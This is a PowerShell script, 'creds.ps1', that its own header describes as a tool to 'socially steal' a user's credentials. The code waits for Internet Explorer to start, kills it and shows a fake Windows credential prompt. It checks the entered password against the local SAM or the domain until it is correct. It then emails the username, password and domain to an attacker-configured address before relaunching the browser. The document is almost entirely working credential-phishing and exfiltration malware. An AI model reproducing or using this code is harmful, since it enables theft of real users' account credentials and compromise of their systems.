################################################################################

1. ########################################################################################################################
2. #creds.ps1
3. #Used to socially steal a user's credentials
4. #Script by: LogoiLab
5. #
6. #synopsis:
7. #
8. #When run: "creds.ps1" will wait for user to open iexplore.exe(internet explorer). Upon the execution of iexplore.exe
9. #the script will stop iexplore.exe and pop up a window telling the user to "Input his/her username and password to use
10. #Internet Explorer" it will then check the creds agianst the SAM Module, if they dont match the current user's, it will
11. #ask agian. Upon correct user/pass combination the script will send an email with all the creds to the specified address
12. #in the "config" section below. Then the script will re-launch iexplore.exe.
13. #config#################################################################################################################
14. #IMAP server address:
15. $serv = ""
16. #IMAP server port:
17. $servport = ""
18. #email account username:
19. $user = ""
20. #email account password:
21. $pass = ""
22. #your email/the email you wish to send from:
23. $from = ""
24. #the address you want the exfil email sent to:
25. $to = ""
26. ########################################################################################################################
27. $process = Get-Process | Where-Object {$_.ProcessName -eq "iexplore"}
28. while ($true){
29. while (!($process))
30. {
31. $process = Get-Process | Where-Object {$_.ProcessName -eq "iexplore"}
32. start-sleep -s 1
33. }
34. if ($process)
35. {
36. stop-process -processname iexplore -force
37. $process.WaitForExit()
38. start-sleep -s 1
39. $process = Get-Process | Where-Object {$_.ProcessName -eq "iexplore"}
40. $ErrorActionPreference="SilentlyContinue"
41. Add-Type -assemblyname system.DirectoryServices.accountmanagement
42. $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
43. $domainDN = "LDAP://" + ([ADSI]"").distinguishedName
44. while($true)
45. {
46. $credential = $host.ui.PromptForCredential("Credentials are required to perform this operation", "Please enter your user name and password.", "", "")
47. if($credential)
48. {
49. $creds = $credential.GetNetworkCredential()
50. [String]$user = $creds.username
51. [String]$pass = $creds.password
52. [String]$domain = $creds.domain
53. $authlocal = $DS.ValidateCredentials($user, $pass)
54. $authdomain = New-Object System.DirectoryServices.DirectoryEntry($domainDN,$user,$pass)
55. if(($authlocal -eq $true) -or ($authdomain.name -ne $null))
56. {
57. $script:pastevalue = "Username: " + $user + " Password: " + $pass + " Domain:" + $domain + " Domain:"+ $authdomain.name
58. break
59. }
60. }
61. }
62. $emailSmtpServer = "$serv"
63. $emailSmtpServerPort = "$servport"
64. $emailSmtpUser = "$user"
65. $emailSmtpPass = "$pass"
66.  
67. $emailFrom = "$from"
68. $emailTo = "$to"
69.  
70. $emailMessage = New-Object System.Net.Mail.MailMessage( $emailFrom , $emailTo )
71. $emailMessage.Subject = "Account Email"
72. $emailMessage.IsBodyHtml = $false
73. $emailMessage.Body = $pastevalue
74.  
75. $SMTPClient = New-Object System.Net.Mail.SmtpClient( $emailSmtpServer , $emailSmtpServerPort )
76. $SMTPClient.EnableSsl = $true
77. $SMTPClient.Credentials = New-Object System.Net.NetworkCredential( $emailSmtpUser , $emailSmtpPass );
78.  
79. $SMTPClient.Send( $emailMessage )
80. start-process iexplore
81. exit
82. }
83. }